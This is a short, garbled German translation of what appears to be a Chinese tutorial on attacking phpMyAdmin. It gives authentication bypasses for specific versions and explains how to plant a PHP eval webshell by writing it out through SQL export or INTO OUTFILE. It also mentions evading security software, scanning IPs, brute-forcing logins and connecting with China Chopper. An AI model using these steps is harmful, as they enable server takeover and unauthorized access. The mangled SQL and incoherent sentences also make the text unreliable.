Analyse von PHPmyadmin-Schwachstellen und Einführung in die Shell

Die folgende Tutorial-Kolumne von phpmyadmin stellt Ihnen die Schwachstellen von PHPmyadmin und den Erwerb der Shell vor. Ich hoffe, dass sie Freunden, die sie benötigen, hilfreich sein wird!

Es gibt relativ viele Lücken in phpmyadmin. Für Anfänger möchte ich einige Lücken teilen. Wer sich mit Code-Auditing auskennt, kann auch mit mir darüber diskutieren
phpmyadmin2.11.3-2.11 .4 In diesen beiden Versionen gibt es ein universelles Passwort. Verwenden Sie „localhost“@‘@“ direkt als Kontonummer und es ist nicht erforderlich, das Passwort einzugeben.

phpmyadmin2.11.9.2 Es gibt ein leeres Passwort Melden Sie sich in dieser Version direkt als Root-Benutzer an.

Wenn Sie dies finden möchten, verwenden Sie Ihr eigenes Skript oder eine Suchmaschine. Wenn Sie es nicht wissen, wissen Sie es wird nicht hier sein.

Über das Erhalten von Shell, ----》Root-Berechtigungen und Schreibberechtigungen----„Das exportierte Verzeichnis verfügt über Schreibberechtigungen----“ In einigen Fällen, auch wenn Sie welche haben In beiden Fällen wirken sich einige Konfigurationen des Servers immer noch darauf aus einen Satz, exportieren Sie ihn dann in eine PHP-Datei und löschen Sie schließlich die Tabelle. Dies ist die sicherste Methode. Erstellen Sie eine TABLE-Tabelle (Spaltentext NICHT NULL). _POST[mima])?>')

Spalte aus Tabelle in _utfile 'Pfad' auswählen

TABLE IF EXISTS-Tabelle löschen Die zweite Methode

besteht darin, direkt

select 'Satz' IN _UTFILE 'Pfad' zu schreiben Es gibt mehrere andere Methoden, die allgemeinen Prinzipien sind die gleichen Dann sind im Allgemeinen alle Wörter

<span style="font-size: 16px;"><?php @eval($_POST[x])?><br/></span>

Wenn Sie einen Hund haben, verwenden Sie den Satz „Töten vermeiden“. Ich habe vor dem chinesischen Neujahr gebaut, um den Hund zu passieren. Du solltest ihn jetzt noch passieren können Wenn Sie es nicht wissen, werden Sie es langsam verstehen. Das Skript scannt eine IP und zeigt an, dass sie existiert

Ein Satz dieser PHP-Dateien ist eine Hintertür, fügen Sie ihn in Zehntausende Wörterbücher ein und explodieren Sie ihn in zwei Sekunden

direkt Chopper Link.

Dies muss geschehen sein, es besteht keine Notwendigkeit für ein Upgrade.

Das obige ist der detaillierte Inhalt vonAnalyse von PHPmyadmin-Schwachstellen und Einführung in die Shell. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!